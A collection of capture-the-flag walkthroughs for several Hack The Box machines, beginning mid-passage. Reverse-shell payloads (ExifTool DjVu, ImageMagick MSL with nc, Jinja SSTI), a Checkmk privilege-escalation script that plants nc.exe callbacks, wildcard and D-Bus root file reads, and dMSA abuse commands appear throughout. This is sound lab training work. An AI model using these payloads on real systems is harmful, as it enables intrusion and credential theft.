The way to exploit this is by sending any input that isn't an int:

Back in the first terminal we notice:

We can then use the following command to spawn a root shell:

:::tldr When the exception is caught, the code explicitly calls pdb.post_mortem(e.__traceback__). post_mortem() receives the traceback object (e.__traceback__) and starts pdb positioned at the point of the exception. That gives you an interactive (Pdb) prompt in the terminal where the root process was started (the terminal running sudo /usr/bin/python3 /opt/remote-manage.py). :::

root.txt

HTB-Meta

Maxim Andrei Koltypin — Mon, 27 Oct 2025 00:00:00 GMT

Scope:
10.10.11.140

Recon

Nmap


PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open  http    syn-ack Apache httpd
|_http-title: Did not follow redirect to http://artcorp.htb
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

80/TCP - HTTP

This just appears to be a static website with nothing else here:

ffuf

Using ffuf I found another vhost:

dev01.artcorp.htb

I uploaded a sample png file:

Since the webserver runs on php I tried to upload a webshell but got an error:

Time to do some manipulation.

I need to change both of these in order to actually achieve a result.

I instead uploaded sample.png first:

And modified it during the intercept:

However this still gave an error.

gobuster

I went ahead and did a directory enum:

This gave me a hit which also showed the tool that was doing all the work:

It seems that exiftool is the one responsible for showing the metadata. This makes sense as the regular output for exiftool looks like this:

exiftool

I started focussing on finding public exploits and CVE's:

It looks like there's 2 of them CVE-2021-22204 & CVE-2021-22205:

Exploitation

CVE-2021-22204

Let's test it out.

# On the local machine
sudo apt install djvulibre-bin

# Create payload file with reverse shell
cat > payload
(metadata "\c${system('bash -c \"bash -i >& /dev/tcp/10.10.14.8/443 0>&1\"')};")

# Compress the payload
bzz payload payload.bzz

# Compile the file
djvumake exploit.djvu INFO='1,1' BGjp=/dev/null ANTz=payload.bzz

Next up I crafted the config file:

%Image::ExifTool::UserDefined = (
    'Image::ExifTool::Exif::Main' => {
        0xc51b => {
            Name => 'HasselbladExif',
            Writable => 'string',
            WriteGroup => 'IFD0',
        },
    },
);
1; #end%

Next up I inserted the payload into a random jpg file:

exiftool -config configfile '-HasselbladExif<=exploit.djvu' sample.jpg

I went ahead and uploaded the image file:

And checked my listener:

Foothold

Shell as www-data

I started doing some enumeration

I had no permissions over the user.txt flag:

Neither could I execute sudo -l:

Enumeration

linpeas

I went ahead and uploaded linpeas.sh in order to speed up my enum:

This might be promising.

pspy32

However linpeas bugged out and wouldn't continue for some reason so I launched pspy32 to enumerate the running processes:

Here I found the following processes running under the thomas user:

I checked out the permissions as well as the contents:

I didn't have write permissions unfortunately so I needed to go another way.

mogrify

mogrify appears to be a part of the ImageMagick toolset.

In order to narrow down the results we can use the following command to find the current version:

After some thorough searching I found the matching CVE:

CVE-2020-29599

I found a related blogpost:

The poster goes in full detail of the CVE in his blog post:

We find the PoC by scrolling down:

<image authenticate='ff" `echo $(id)> ./out`;"'>
  <read filename="pdf:/etc/passwd"/>
  <get width="base-width" height="base-height" />
  <resize geometry="400x400" />
  <write filename="test.png" />
  <svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">       
  <image xlink:href="msl:poc.svg" height="100" width="100"/>
  </svg>
</image>

I then test the command out:

Since this worked I went ahead and created one with a reverse shell payload:

<image authenticate='ff" `echo $(busybox nc 10.10.14.8 445 -e bash)> ./out`;"'>
  <read filename="pdf:/etc/passwd"/>
  <get width="base-width" height="base-height" />
  <resize geometry="400x400" />
  <write filename="test.png" />
  <svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">       
  <image xlink:href="msl:poc.svg" height="100" width="100"/>
  </svg>
</image>

Shell as thomas

I inserted the above payload and waited for a short while for the shell to trigger:

user.txt

I went ahead and copied the id_rsa afterwards so I could log in via ssh:

Privilege Escalation

neofetch

Unfortunately the sudoers rule doesn't allow us to exploit it the GTFObins way:

echo 'exec /bin/sh' > .config/neofetch/config.conf 
XDG_CONFIG_HOME=~/.config sudo neofetch

:::tldr This works since we're not passing any arguments after the neofetch command. :::

root.txt

HTB-Usage

Maxim Andrei Koltypin — Mon, 27 Oct 2025 00:00:00 GMT

Scope:
10.10.11.18

Recon

Nmap

sudo nmap -sC -sV -sT -p- -vvvv -T5 --min-rate=5000 -Pn usage.htb

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack nginx 1.18.0 (Ubuntu)
|_http-title: Daily Blogs
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
| http-methods: 
|_  Supported Methods: GET HEAD
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

80/TCP - HTTP

I analyse the request right away in burp:

I take note of the laravel_session inside the Cookie header.

Clicking on Admin redirects us to the admin.usage.htb vhost.

Here I tried to login using default creds:

I went back to the original site and registered for an account:

And logged in:

Other than that there's nothing here apart from some blogs.

SQLi

I tried some more functionalities as well as the Reset Password:

I tried adding a ' here and noticed the 500 error, meaning it was probably susceptible to SQLi:

I confirmed this by adding -- -:

I copied the request and did some automated testing using sqlmap:

It started dumping info extremely slow since it went with the time-based blind payloads so I instead reran it:

sqlmap -r req.txt --batch --level 5 --risk 3 --threads 10 --dbms=mysql -D usage_blog -T admin_users --dump  --skip _token

Hash cracking

I went ahead and cracked the hash

admin
whatever1

admin.usage.htb

We can now log in with the creds:

I started looking for exploits:

I found the exploit here:

Foothold

Shell as dash

I followed the instructions and got a shell:

Enumeration

I noticed one other user called xander:

I started looking around:

staff
s3cr3t_c0d3d_1uth

I checked out whether mysql was running:

But first I went ahead and enumerated my /home directory:

I copied over the id_rsa and logged in via ssh:

user.txt

I started checking further and found another set of creds:

admin
3nc0d3d_pa$$w0rd

However in order to access this instance we need to create a port forward since it's only running on localhost.

Port Forward

I can now use the found creds to log in:

Privilege Escalation

Monit

I was looking around to see whether this might be the path:

But it looks like a completely different scenario so I skipped it.

usage_management

Instead I sprayed the password and it turns out the password is reused by xander:

It turns out xander can run the usage_management binary as root:

The binary had 3 options:

Since this is a custom binary we need to understand what's happening underneath, what better place to start than with strings:

We notice that it zips the /var/www/html directory up using 7z. However we also notice the Wildcard * option at the end!

Wildcard Exploitation

From the /var/www/html directory we can create the following linked file:

touch @tester; ln -fs /root/.ssh/id_rsa tester

Upon execution we see the id_rsa for root being dumped:

We can copy the output and remove the No more files lines and log in via ssh:

root.txt

HTB-GoodGames

Maxim Andrei Koltypin — Tue, 28 Oct 2025 00:00:00 GMT

Scope:
10.10.11.130

Recon

Nmap

sudo nmap -sC -sV -sT -p- -vvvv -T5 --min-rate=5000 -Pn 10.10.11.130

PORT   STATE SERVICE REASON  VERSION
80/tcp open  http    syn-ack Werkzeug httpd 2.0.2 (Python 3.9.2)
| http-methods: 
|_  Supported Methods: HEAD OPTIONS GET POST
|_http-server-header: Werkzeug/2.0.2 Python/3.9.2
|_http-favicon: Unknown favicon MD5: 61352127DC66484D3736CACCF50E7BEB
|_http-title: GoodGames | Community and Store

80/TCP - HTTP

The site seems to be running on python, meaning it's LIKELY a Flask or Django instance.

wappalyzer tells us it's running on Flask 2.0.2.

I went ahead and tested the functionality of the website such as the sign up page:

I analysed the requests in burp:

The cookie looks like a JWT token:

Other than that I didn't find anything so I started off by automating some testing.

Exploitation

SQLi

I went ahead and tested some of the POST requests like the password reset and such using sqlmap until one of them worked:

I cracked this password using crackstation

admin@goodgames.htb
superadministrator

This time a new Icon appeared:

Clicking on it redirects us to another vhost:

internal-administration.goodgames.htb

I can log in with the previously found creds:

SSTI

However since this is Flask I tried out to exploit a SSTI vulnerability:

It worked since this is the expected output of the jinja templating language.

:::note The result will enable us to deduce the template engine used by the web application. In Jinja, the result will be 7777777, while in Twig for example, the result will be 49. Since this application is running on Flask though, jinja is the only viable option here. :::

We can start testing various payloads, the following for example outputs the web application's configuration:

{{ config.items() }}

We can use the following to achieve LFI:

{{ self.__init__.__globals__.__builtins__.open("/etc/passwd").read() }}

And we can even achieve RCE by importing the os library.

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('whoami;id').read() }}

Well that's convenient! However after some further testing I found out that this instance is running from a docker container:

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('ip a').read() }}

This is verified using the following payload:

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('ls -la').read() }}

Foothold

Docker shell as root

With the use of the following payload I got myself a reverse shell into the docker container:

{{ self.__init__.__globals__.__builtins__.__import__('os').popen("python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"10.10.14.8\",80));[os.dup2(s.fileno(),f) for f in (0,1,2)];pty.spawn(\"/bin/bash\")'").read() }}

However I can still get the user.txt flag easily.

user.txt

The root.txt flag however is not present:

Docker Escape

Ligolo-ng

Since the augustus user is mounted here we can try to upload our ssh key to their .ssh directory in order to get a foothold that way. In order to do this though we need to set up a ligolo port forward first since the 22 port isn't open to the outside.

nohup ./agent -connect 10.10.14.8:11601 -ignore-cert >/dev/null 2>&1 &

Next up we transfer the id_rsa.pub:

Shell as augustus

Now it's as easy as pie:

We notice that we've successfully escaped the docker container.

Privilege Escalation

From the ssh host we will copy over the bash binary:

From the docker container we will modify the permissions on the binary:

Profit

root.txt

HTB-Passage

Maxim Andrei Koltypin — Tue, 28 Oct 2025 00:00:00 GMT

Scope:
10.10.10.206

Recon

Nmap

sudo nmap -sC -sV -sT -p- -vvvv -T5 --min-rate=5000 -Pn passage.htb

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Passage News
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

80/TCP - HTTP

We can leave comments:

:::note The blog mentions that they've implemented a Fail2Ban system where it will block us for 2 minutes in case of heavy traffic so we will have to limit our automated testing. :::

I checked out the tech stack:

And noticed that the site is powered by CuteNews and the copyright mentions Passage News 2020 so I started checking for exploits:

Exploitation

CVE-2019-11447

I checked out the exploit:

I went ahead and tested it out:

And we've successfully achieved RCE, time to execute some commands.

Foothold

Shell as www-data

I then established a reverse shell connection:

Hereafter I enumerated the users present on the target:

I didn't have permissions over either directories.

Looking around in the webroot I found something interesting:

These files all contained lines that looked like this:

These are base64 encoded and are easily decoded:

However some files, like b0.php in this case, were bigger and contained more info:

It looks like some of these contain hashes, which is great since there are 2 users on the system, where one of them is paul. We can enumerate this quicker instead of just going through them manually:

for f in *; do
>   body=$(sed -n '1,200p' "$f" \
>     | sed '1s/^<?php.*die;//I' \
>     | tr -d '\r\n' \
>     | sed 's/[^A-Za-z0-9+\/=]//g')
>   [ -z "$body" ] && continue
>   echo "$body" | base64 -d 2>/dev/null || continue
> done \
> | perl -0777 -ne '
>   # match the structure: s:<len>:"name";a:<n>:{ s:<len>:"<username>";a:<m>:{ ... s:4:"pass";s:<len>:"<hash>" ...
>   while (m/s:\d+:"name";a:\d+:\{\s*s:\d+:"([^"]+)";a:\d+:\{.*?s:4:"pass";s:\d+:"([0-9a-f]{64})"/gs) {
>     print "$1:$2\n";
>   }
> ' \
> | sort -u

Only 2 of these were crackable:

Shell as paul

We can use the following creds to get a shell as paul:

paul
atlanta1

user.txt

Enumeration

Unfortunately I can't run sudo -l:

I then read the id_rsa and used it to log in:

While checking further I didn't see anything noteworthy on the surface except for the fact that the id_rsa.pub had nadav's name in it:

Could this be a shared key?

Shell as nadav

It turns out the same key can be used to log in as nadav.

Enumeration

While I can't run sudo -l:

I did notice that this user is in some interesting groups to say the least:

Unfortunately for us though we can't do anything with the sudo group as we don't have the password for nadav...

Privilege Escalation

USBCreator D-Bus

I found a blog that showed a flaw in the USBCreator D-Bus interface:

Interestingly they mention the same nadav user in their blog:

Exploitation

Copy a file to a non-existent file location:

gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/root.txt /tmp/owned true

Read the file:

Now we can abuse the fetched id_rsa to log in as root.

root.txt

HTB-NanoCorp

Maxim Andrei Koltypin — Wed, 12 Nov 2025 00:00:00 GMT

import PasswordProtect from "~/components/PasswordProtect.client";

Scope:
10.10.11.93

Recon

Nmap

sudo nmap -sC -sV -sT -Pn -T5 -vvvv --min-rate=5000 10.10.11.93

PORT     STATE SERVICE           REASON  VERSION
53/tcp   open  domain            syn-ack Simple DNS Plus
80/tcp   open  http              syn-ack Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
| http-methods: 
|   Supported Methods: GET POST OPTIONS HEAD TRACE
|_  Potentially risky methods: TRACE
|_http-title: Nanocorp
88/tcp   open  kerberos-sec      syn-ack Microsoft Windows Kerberos (server time: 2025-11-12 14:23:30Z)
135/tcp  open  msrpc             syn-ack Microsoft Windows RPC
139/tcp  open  netbios-ssn       syn-ack Microsoft Windows netbios-ssn
389/tcp  open  ldap              syn-ack Microsoft Windows Active Directory LDAP (Domain: nanocorp.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?     syn-ack
464/tcp  open  kpasswd5?         syn-ack
593/tcp  open  ncacn_http        syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ldapssl?          syn-ack
3268/tcp open  ldap              syn-ack Microsoft Windows Active Directory LDAP (Domain: nanocorp.htb0., Site: Default-First-Site-Name)
3269/tcp open  globalcatLDAPssl? syn-ack
5986/tcp open  ssl/http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=dc01.nanocorp.htb
| Subject Alternative Name: DNS:dc01.nanocorp.htb
| Issuer: commonName=dc01.nanocorp.htb
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn: 
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 6h59m58s
| smb2-time: 
|   date: 2025-11-12T14:23:43
|_  start_date: N/A
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 22381/tcp): CLEAN (Timeout)
|   Check 2 (port 20267/tcp): CLEAN (Timeout)
|   Check 3 (port 64929/udp): CLEAN (Timeout)
|   Check 4 (port 35963/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

80/TCP - HTTP

By clicking on About Us it takes us to a subdomain:

hire.nanocorp.htb

I created the following .zip file by combining some files and tested the File Upload functionality:

I checked out the request via burp:

I then ran a gobuster scan in order to enumerate the possible upload location:

It seems that there's a /uploads directory but it shows up as 403 FORBIDDEN.

We are in fact unable to reach our uploaded testing.zip file.

CVE-2025-24071

Looking around I was able to find a PoC which looked promising for this exact scenario:

Looking further I was able to find this github page which linked to this blog post on how to exploit it:

It looks pretty straight forward, let's download over the PoC script.

Exploitation

PoC

Now I just had to run responder and upload the zip file.

john

This hash can easily be cracked using john:

web_svc
dksehdgh712!@#

Enumeration

nxc

Using nxc I started enumerating the target:

Nothing notable was found within the shares.

Using the above I was able to enumerate 1 other user present called monitoring_svc.

BloodHound

I then went ahead and started enumerating via bloodhound-ce:

The path here looked pretty straightforward:

AddSelf

Using bloodyAD I was able to add the web_svc user to the IT_SUPPORT group:

ForceChangePassword

Next up I used bloodyAD again to change the password of the monitoring_svc user:

Although the password change worked nxc showed an error:

This is because the monitoring_svc user is part of the PROTECTED USERS group:

impacket-getTGT

After a reset I used the following commands to get the kerberos TGT

:::important The TGT is needed in order to log in since PROTECTED USERS blocks any and all ntlm login attempts. :::

The following had to be changed within the /etc/krb5.conf file:

I was now able to export the .ccache file:

Foothold

5986/TCP - winrms

:::important For the below I had to install evil-winrm-py to get it to work. This can be done using pipx install 'evil-winrm-py[kerberos]' :::

user.txt

Enumeration

It was time to start enumerating the user and the host.

I then ran some automated enum:

The following was found, unknown whether this would prove useful though.

Other than that nothing was really found using winpeas here.

Privilege Escalation

CVE-2024-0670 - Check_mk_agent

:::note My shell dropped and I couldn't reconnect via evil-winrm-py so I looked for yet another solution :::

After doing some searching I found the following blog post:

This blog also contained the PoC:

[!quote]+ In some cases, the software creates temporary files inside the directory C:\Windows\Temp that get executed afterwards. An attacker can leverage this to place write-protected malicious files in the directory beforehand. The files get executed by Checkmk with SYSTEM privileges allowing attackers to escalate their privileges.

Attack chain

In order to exploit this CVE we'll have to use the following commands.

Copy over the runascs.exe binary:

For this step we'll have to download over the nc.exe binary, but it needs to be placed inside the C:\Windows\Temp directory:

Next up we will create a script called shell.ps1 which will exploit the Check_mk_agent:

param(
    [int]$MinPID = 1000,
    [int]$MaxPID = 15000,
    [string]$LHOST = "10.10.14.42", # CHANGE THIS
    [string]$LPORT = "80" # CHANGE THIS AS WELL
)

# 1. Define the malicious batch payload
$NcPath = "C:\Windows\Temp\nc.exe"
$BatchPayload = "@echo off`r`n$NcPath -e cmd.exe $LHOST $LPORT"

# 2. Find the MSI trigger
$msi = (
    Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\*\InstallProperties' |
    Where-Object { $_.DisplayName -like '*mk*' } |
    Select-Object -First 1
).LocalPackage

if (!$msi) {
    Write-Error "Could not find Checkmk MSI"
    return
}

Write-Host "[*] Found MSI at $msi"

# 3. Spray the Read-Only files
Write-Host "[*] Seeding $MinPID to $MaxPID..."

foreach ($ctr in 0..1) {
    for ($num = $MinPID; $num -le $MaxPID; $num++) {

        $filePath = "C:\Windows\Temp\cmk_all_$($num)_$($ctr).cmd"

        try {
            [System.IO.File]::WriteAllText($filePath, $BatchPayload, [System.Text.Encoding]::ASCII)
            Set-ItemProperty -Path $filePath -Name IsReadOnly -Value $true -ErrorAction SilentlyContinue
        }
        catch {
            # 123
        }
    }
}

Write-Host "[*] Seeding complete."

# 4. Launch the trigger
Write-Host "[*] Triggering MSI repair..."
Start-Process "msiexec.exe" -ArgumentList "/fa `"$msi`" /qn /l*vx C:\Windows\Temp\cmk_repair.log" -Wait

Write-Host "[*] Trigger sent. Check listener."

This script get's transfered over to the target and a listener is launched.

Copy the file to C:\Windows\Temp and run the following commands

copy shell.ps1 C:\Windows\Temp\shell.ps1

.\runascs.exe web_svc 'dksehdgh712!@#' “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -E
xecutionPolicy Bypass -File C:\Windows\Temp\shell.ps1”

Profit

root.txt

</PasswordProtect>

HTB-Eighteen

Maxim Andrei Koltypin — Mon, 17 Nov 2025 00:00:00 GMT

import PasswordProtect from "~/components/PasswordProtect.client";

Scope:
10.10.11.95

Creds:
kevin
iNa2we6haRj2gaw!

Recon

Nmap

sudo nmap -sC -sV -sT -p- -vvvv -T5 --min-rate=5000 -Pn eighteen.htb 

PORT     STATE SERVICE  REASON  VERSION
80/tcp   open  http     syn-ack Microsoft IIS httpd 10.0
|_http-title: Welcome - eighteen.htb
| http-methods: 
|_  Supported Methods: GET OPTIONS HEAD
|_http-server-header: Microsoft-IIS/10.0
1433/tcp open  ms-sql-s syn-ack Microsoft SQL Server 2022 16.00.1000.00; RTM
| ms-sql-info: 
|   10.10.11.95:1433: 
|     Version: 
|       name: Microsoft SQL Server 2022 RTM
|       number: 16.00.1000.00
|       Product: Microsoft SQL Server 2022
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ms-sql-ntlm-info: 
|   10.10.11.95:1433: 
|     Target_Name: EIGHTEEN
|     NetBIOS_Domain_Name: EIGHTEEN
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: eighteen.htb
|     DNS_Computer_Name: DC01.eighteen.htb
|     DNS_Tree_Name: eighteen.htb
|_    Product_Version: 10.0.26100
|_ssl-date: 2025-11-17T16:59:02+00:00; +6h59m59s from scanner time.
5985/tcp open  http     syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

I tried the creds for winrm but they didn't work, let's try them for port 80 instead.

80/TCP - HTTP

I tried the provided creds here but it didn't work here either.

1433/TCP - MSSQL

I then tried out the mssql service where the creds did seem to work:

I proceeded by logging in via impacket-mssqlclient:

:::important Contrary to the nxc command, mssqlclient only worked while omitting the -windows-auth tag. :::

I wasn't able to enable the xp_cmdshell so it was time for some enumeration.

enumeration

From this context I enumerated my current user further:

I then followed up with the following query which would enumerate all present users and which db's they could access:

SELECT d.database_id, d.name AS database_name, dp.name AS db_user, dp.type_desc FROM sys.databases d CROSS APPLY ( SELECT name, type_desc FROM sys.database_principals ) dp WHERE d.database_id = DB_ID();

This confirms that we're currently stuck inside the master db.

Next up I looked for interesting accounts:

SELECT principal_id, name, type, type_desc, is_disabled, create_date FROM sys.server_principals ORDER BY type_desc, name;

Using the following command we can then check whether we can impersonate someone:

SELECT pr.name AS principal_with_right, pe.permission_name, pe.state_desc FROM sys.server_permissions pe JOIN sys.server_principals pr ON pe.grantee_principal_id = pr.principal_id WHERE pe.permission_name LIKE '%IMPERSONATE%';

This is good, let's check further:

SELECT pe.permission_name, pe.state_desc, pe.class_desc, pe.major_id AS target_principal_id, sp_target.name AS target_principal_name FROM sys.server_permissions pe LEFT JOIN sys.server_principals sp_target ON pe.major_id = sp_target.principal_id WHERE pe.permission_name = 'IMPERSONATE' AND pe.grantee_principal_id = (SELECT principal_id FROM sys.server_principals WHERE name='kevin');

impersonating appdev

It turns out we can impersonate the appdev user, let's try it out.

EXECUTE AS LOGIN = 'appdev';
SELECT ORIGINAL_LOGIN() AS original_login, SUSER_SNAME() AS current_login, USER_NAME() AS db_user;
SELECT IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;
SELECT * FROM fn_my_permissions(NULL, 'SERVER');

With the above commands I enumerated the permissions of the appdev user, turns out we can now check out other databases with them:

Let's check out the financial_planner database.

financial_planner

Since we don't see any non-default tables we'll assume everything's under dbo.

SELECT s.name AS schema_name, t.name AS table_name FROM sys.tables t JOIN sys.schemas s ON t.schema_id = s.schema_id ORDER BY schema_name, table_name;

We notice the users table, let's check it out:

SELECT * FROM dbo.users;

This is a python werkzeug hash which I tried to crack using hashcat but failed.

Exploitation

Hash cracking

Instead I used the following script to crack the password:

admin
iloveyou1

Using these creds I was able to log into the admin dashboard on port 80:

Down at the bottom I noticed the previous user had tried exploiting the flask templating language:

This led to a death end though, leading me to check elsewhere.

Password Spraying

Instead I first used nxc to enumerate the users on the target:

I then password sprayed the found password against the enumerated users.

Foothold

5985/TCP - WINRM

Using the following credentials I logged in:

adam.scott
iloveyou1

user.txt

Enumeration

I transferred over winpeas and let it enumerate the target.

I found some named pipes:

However these could not be exploited:

This didn't show anything interesting though. One thing I did find though was the abundance of internally exposed AD ports:

One way to expose these would be through Port Forwarding.

Tunneling

I then enumerated the target using bloodhound but this didn't show anything useful either. Instead I had to port forward first using ligolo in order to expose the internal ports.

I then set up the port forward:

bloodyAD

Once I had the port forward set up I tried some commands using bloodyAD:

:::note It was now able to reach the AD server (unlike previously), all that's left is to get the correct command down.

:::

I used this cheatsheet to enumerate the target using various bloodyAD commands. One command showed me some interesting output:

This showed us that we have WRITE permissions, however we still couldn't do much with it at this point. From my nxc enumeration I remembered the system version of the target.

While this version seems up to date, there have apparently been found flaws already that could help us in this case.

Privilege Escalation

BadSuccessor - Abusing dMSA

Looking around on google I found the following blog post that matched my current situation:

A bit further down we see how it matches the current situation.

Exploitation

I then got to the exploitation part and used the following command to create a new computer:

New-MachineAccount -MachineAccount ATTACKER -Password (ConvertTo-SecureString 'P@ssword123' -AsPlainText -Force) -DistinguishedName "CN=ATTACKER,OU=Staff,DC=eighteen,DC=htb"

As the blog mentions:

:::note To achieve privilege escalation within the domain, it is necessary either to create a dMSA account or to have write permissions on the msDS-ManagedAccountPrecededByLink and msDS-DelegatedMSAState attributes of an existing dMSA account. :::

Next up we'll use the following command:

New-ADServiceAccount -Name "vulnDMSA" -DNSHostName "vulndmsa.eighteen.htb" -CreateDelegatedServiceAccount -PrincipalsAllowedToRetrieveManagedPassword "CN=ATTACKER,OU=Staff,DC=eighteen,DC=htb" -Path "OU=Staff,DC=eighteen,DC=htb"

Then the following:

# Identity you control
$identity = "eighteen\adam.scott"
 
# DN of the target DMSA object
$objectDN = "CN=vulnDMSA,OU=Staff,DC=eighteen,DC=htb"
 
# Get current ACL on the DMSA
$acl = Get-Acl "AD:$objectDN"
 
# Convert identity into an NTAccount object
$identityRef = New-Object System.Security.Principal.NTAccount($identity)
 
# Create a GenericAll ACE (full control on this ONE object)
$ace = New-Object System.DirectoryServices.ActiveDirectoryAccessRule `
(
    $identityRef,
    [System.DirectoryServices.ActiveDirectoryRights]::GenericAll,
    [System.Security.AccessControl.AccessControlType]::Allow
)
 
# Add ACE to object ACL
$acl.AddAccessRule($ace)
 
# Write back ACL
Set-Acl -Path "AD:$objectDN" -AclObject $acl

Once that is done the next commands:

# Bind to the DMSA object
$dMSA = [ADSI]"LDAP://CN=vulnDMSA,OU=Staff,DC=eighteen,DC=htb"

# Mark migration as finished (required before modifying precededBy)
$dMSA.Put("msDS-DelegatedMSAState", 2)

# Set the precededBy link to the target object (Administrator in this example)
$dMSA.Put("msDS-ManagedAccountPrecededByLink", "CN=Administrator,CN=Users,DC=eighteen,DC=htb")

# Commit the changes
$dMSA.SetInfo()

:::note During the creation of the dMSA account, the attacker obtains the TGT ticket associated with the machine account they are using via the PrincipalsAllowedToRetrieveManagedPassword configuration, making this machine account the preferred choice since it has the necessary permissions to read the dMSA object’s password. :::

.\Rubeus.exe asktgt /user:ATTACKER$ /password:'P@ssword123' /enctype:aes256 /nowrap

However this ultimately did not work for some reason:

more bloodyAD

Instead I opted to use bloodyAD instead of doing it via powershell. In order to do this though I had to reference the following github issue since it wouldn't work:

I looked up where my bloodyAD package was installed and modified the code:

Once this was fixed it worked without an issue:

bloodyAD --dc-ip 240.0.0.1 -d eighteen.htb -u adam.scott -p iloveyou1 add badSuccessor hacker3

Now I was able to get the service ticket:

impacket-getST -dc-ip 240.0.0.1 -spn 'ldap/dc01.eighteen.htb' eighteen.htb/hacker3$ -k -no-pass

Once this was done it was free game:

impacket-psexec -k -no-pass 'eighteen.htb/hacker3$@dc01.eighteen.htb'

root.txt

</PasswordProtect>

HTB-Hercules

Maxim Andrei Koltypin — Wed, 19 Nov 2025 00:00:00 GMT

import PasswordProtect from "~/components/PasswordProtect.client";

Scope:
10.10.11.91

Recon

Nmap

sudo nmap -sC -sV -sT -p- -vvvv -T5 --min-rate=5000 -Pn hercules.htb 

PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Simple DNS Plus
80/tcp    open  http          syn-ack Microsoft IIS httpd 10.0
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to https://hercules.htb/
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2025-11-19 09:55:05Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: hercules.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.hercules.htb
| Subject Alternative Name: DNS:dc.hercules.htb, DNS:hercules.htb, DNS:HERCULES
| Issuer: commonName=CA-HERCULES/domainComponent=hercules
443/tcp   open  ssl/http      syn-ack Microsoft IIS httpd 10.0
| tls-alpn: 
|_  http/1.1
|_http-title: Hercules Corp
| ssl-cert: Subject: commonName=hercules.htb
| Subject Alternative Name: DNS:hercules.htb
| Issuer: commonName=hercules.htb
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: hercules.htb0., Site: Default-First-Site-Name)
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: hercules.htb0., Site: Default-First-Site-Name)
3269/tcp  open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: hercules.htb0., Site: Default-First-Site-Name)
5986/tcp  open  ssl/http      syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
| ssl-cert: Subject: commonName=dc.hercules.htb
| Subject Alternative Name: DNS:dc.hercules.htb, DNS:hercules.htb, DNS:HERCULES
| Issuer: commonName=CA-HERCULES/domainComponent=hercules
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
49664/tcp open  msrpc         syn-ack Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack Microsoft Windows RPC
49674/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49684/tcp open  msrpc         syn-ack Microsoft Windows RPC
50731/tcp open  msrpc         syn-ack Microsoft Windows RPC
50737/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker: 
